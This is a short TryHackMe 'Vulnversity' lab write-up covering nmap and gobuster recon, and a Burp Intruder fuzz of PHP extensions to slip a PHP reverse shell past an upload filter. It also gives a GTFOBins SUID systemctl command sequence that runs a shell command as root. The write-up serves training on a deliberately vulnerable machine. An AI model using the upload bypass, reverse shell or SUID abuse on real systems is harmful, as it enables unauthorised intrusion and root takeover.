Skip to main content

Vulnversity writeup [thm]

pic

Learn about active recon, web app attacks and privilege escalation.

This writeup of Vulnversity will be brief and not very detailed.


Reconnaissance

$: nmap -A -p- $target

Gives you all the information you need.

Locating directories using GoBuster

$: gobuster dir -u $target  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Compromise the webserver

Just follow the instructions.

We found an upload page and we want to upload a reverse shell. The extension .php is blocked.

Create a file containing the following list of PHP extensions:

.php
.php3
.php4
.php5
.phtml

Configure BurpSuite to intercept all your browser traffic. Upload a file and grab this request and send to the Intruder. Click on "Payloads" and select "Sniper". Go to "Positions" find the filename and "Add §" to the extension.

By executing this attack we find that the .phtml extension is allowed.

Rename php-reverse-shell.php to php-reverse-shell.phtml. Start listening with netcat, upload and execute the shell.

What is the name of the user who manages the webserver?

Just look around.

What is the user flag?

You know what to do.

Privilege Escalation

Searching for all SUID files with

$: find / -user root -perm -4000 -exec ls -ldb {} \;

we find /bin/systemctl.

If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

sudo install -m =xs $(which systemctl) .

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

From GTFOBins.

Conclusion

BurpSuite is boring and always feels like "cheating" but the privesc was cool. This is the first non-trivial challenge on the Offensive Pentesting path.

Tools used:

  • Nmap
  • Gobuster
  • BurpSuite
  • php-reverse-shell.php
  • Netcat
  • GTFOBins